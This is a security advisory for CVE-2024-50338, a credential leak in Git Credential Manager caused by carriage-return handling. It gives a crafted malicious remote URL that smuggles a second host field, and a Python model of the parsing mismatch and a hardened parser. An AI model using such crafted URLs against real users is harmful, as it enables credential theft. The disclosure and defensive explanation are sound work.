Score: 7.4
CWE: 200, 436

CVE-2024-50338: Carriage-return character in remote URL allows malicious repository to leak credentials in Git Credential Manager

First published: Tue Jan 14 2025

### Description

The [Git credential protocol](https://git-scm.com/docs/git-credential#IOFMT) is text-based over standard input/output and consists of a series of lines of key-value pairs in the format `key=value`. Git's documentation forbids the NUL (`\0`) character and newlines from forming part of the keys[^1] or values. When Git reads from standard input, it considers both LF and CRLF[^2] as newline characters for the credential protocol, because it [calls `strbuf_getline`](https://github.com/git/git/blob/6a11438f43469f3815f2f0fc997bd45792ff04c0/credential.c#L311), which in turn calls `strbuf_getdelim_strip_crlf`. Git also validates that a newline is not present in a value by checking for the line-feed character (LF, `\n`) and errors if one is found. This captures both LF and CRLF-type newlines.

Git Credential Manager uses the .NET standard library [`StreamReader`](https://learn.microsoft.com/en-us/dotnet/api/system.io.streamreader?view=net-8.0) class to [read the standard input stream line-by-line](https://github.com/git-ecosystem/git-credential-manager/blob/ae009e11a0fbef804ad9f78816d84a0bc7e052fe/src/shared/Core/StreamExtensions.cs#L138-L141) and parse the `key=value` credential protocol format. The [implementation of the `ReadLineAsync` method](https://github.com/dotnet/runtime/blob/e476b43b5cb42eb44ce23b1c7b793aa361624cf6/src/libraries/System.Private.CoreLib/src/System/IO/StreamReader.cs#L926) considers LF, CRLF, and CR as valid line endings. This means that .NET treats a single CR as a valid newline character, whereas Git does not.

This mismatch in newline treatment between Git and GCM means that an attacker can craft a malicious remote URL such as:

```
https://\rhost=targethost@badhost
```

which will be interpreted by Git as:

```
protocol=https
host=badhost
username=\rhost=targethost
```

This will instead be parsed by GCM as if the following had been passed by Git:

```
protocol=https
host=badhost
username=
host=targethost
```

This results in the `host` field being resolved to the `targethost` value. GCM will then return a credential for `targethost` to Git, which will then send this credential to the `badhost` host.

### Impact

When a user clones or otherwise interacts[^3] with a malicious repository that requires authentication, the attacker can capture credentials for another Git remote. The attack is also heightened when cloning from repositories with submodules using the `--recursive` clone option, as the user is not able to inspect the submodule remote URLs beforehand.

### Patches

https://github.com/git-ecosystem/git-credential-manager/compare/749e287571c78a2b61f926ccce6a707050871ab8...99e2f7f60e7364fe807e7925f361a81f3c47bd1b

### Workarounds

Only interact with trusted remote repositories, and do not clone with `--recursive`, so that any submodule URLs can be inspected before those submodules are cloned.

### Fixed versions

This issue is fixed as of [version 2.6.1](https://github.com/git-ecosystem/git-credential-manager/releases/tag/v2.6.1).

[^1]: The `=` character is also forbidden to form part of the key.
[^2]: Carriage-return character (CR, `\r`), followed by a line-feed character.
[^3]: Any remote operation such as `fetch`, `ls-remote`, etc.
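The newline mismatch from the Description section, modelled in Python as an added example (not GCM's or Git's code): `str.splitlines()` ends a line at a bare CR just as `StreamReader.ReadLineAsync` does, while the Git-style reader only ends a line at LF. The request string is constructed from the advisory's own example, and `parse_strict` is an assumed hardened reading, not a description of the actual patch.

```python
from typing import Dict, List

# Constructed request modelled on the advisory: what Git writes to the helper's stdin
# for the remote URL https://\rhost=targethost@badhost. Git only refuses LF in values,
# so the bare CR embedded in the username survives serialisation.
GIT_REQUEST = "protocol=https\nhost=badhost\nusername=\rhost=targethost\n\n"


def git_write_check(fields: Dict[str, str]) -> None:
    """Mirror Git's guard on the way out: a value containing LF is an error.
    CRLF is caught by its LF, but a bare CR is not."""
    for key, value in fields.items():
        if "\n" in value:
            raise ValueError(f"newline in credential value for {key!r}")


def _to_fields(lines: List[str]) -> Dict[str, str]:
    """Collect key=value lines up to the blank line that ends a request.
    A repeated key overwrites the earlier one, which is how the smuggled host wins."""
    fields: Dict[str, str] = {}
    for line in lines:
        if line == "":
            break
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    return fields


def parse_like_dotnet(data: str) -> Dict[str, str]:
    """Vulnerable reading: str.splitlines() ends a line at CR, LF or CRLF (plus a few
    other Unicode separators), matching the CR handling of StreamReader.ReadLineAsync."""
    return _to_fields(data.splitlines())


def parse_like_git(data: str) -> Dict[str, str]:
    """Git-compatible reading: only LF ends a line, and one trailing CR is stripped
    (CRLF), as strbuf_getdelim_strip_crlf does. A CR mid-value stays in the value."""
    lines = [ln[:-1] if ln.endswith("\r") else ln for ln in data.split("\n")]
    return _to_fields(lines)


def parse_strict(data: str) -> Dict[str, str]:
    """Hardened reading (an assumption, not a description of GCM's patch): split as Git
    does, then refuse any key or value that still carries CR, LF or NUL."""
    fields = parse_like_git(data)
    for key, value in fields.items():
        if any(c in key or c in value for c in ("\r", "\n", "\0")):
            raise ValueError(f"control character in credential field {key!r}")
    return fields


if __name__ == "__main__":
    git_write_check(parse_like_git(GIT_REQUEST))  # passes: Git sees no LF
    print("git  :", parse_like_git(GIT_REQUEST)["host"])     # badhost
    print(".NET :", parse_like_dotnet(GIT_REQUEST)["host"])  # targethost
```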

Credit: security-advisories@github.com

| Affected Software | Affected Version | How to fix |
|---|---|---|
| Microsoft Visual Studio 2022 | =17.12 | |
| Microsoft Visual Studio 2022 | =17.6 | |
| Microsoft Visual Studio 2019 (includes 16.0 - 16.10) | =16.11 | |
| Microsoft Visual Studio 2022 | =17.8 | |
| Microsoft Visual Studio 2017 (includes 15.0 - 15.8) | =15.9 | |
| Microsoft Visual Studio 2022 | =17.10 | |
| nuget/git-credential-manager | <=2.6.0 | 2.6.1 |


Frequently Asked Questions

  • What is the severity of CVE-2024-50338?

    CVE-2024-50338 has a moderate severity level due to its potential for information disclosure.

  • How do I fix CVE-2024-50338?

    To fix CVE-2024-50338, update to the latest version of Visual Studio 2022 or Visual Studio 2019 as specified in the security advisory.

  • Which versions of Visual Studio are affected by CVE-2024-50338?

    CVE-2024-50338 affects Visual Studio 2017 version 15.9, Visual Studio 2019 version 16.11, and multiple versions of Visual Studio 2022.

  • Is there a specific package that needs to be updated for CVE-2024-50338?

    Yes, the Git Credential Manager package should be updated to version 2.6.1 or newer to mitigate CVE-2024-50338.

  • What type of vulnerability is CVE-2024-50338?

    CVE-2024-50338 is a type of information disclosure vulnerability that affects the Git credential protocol.
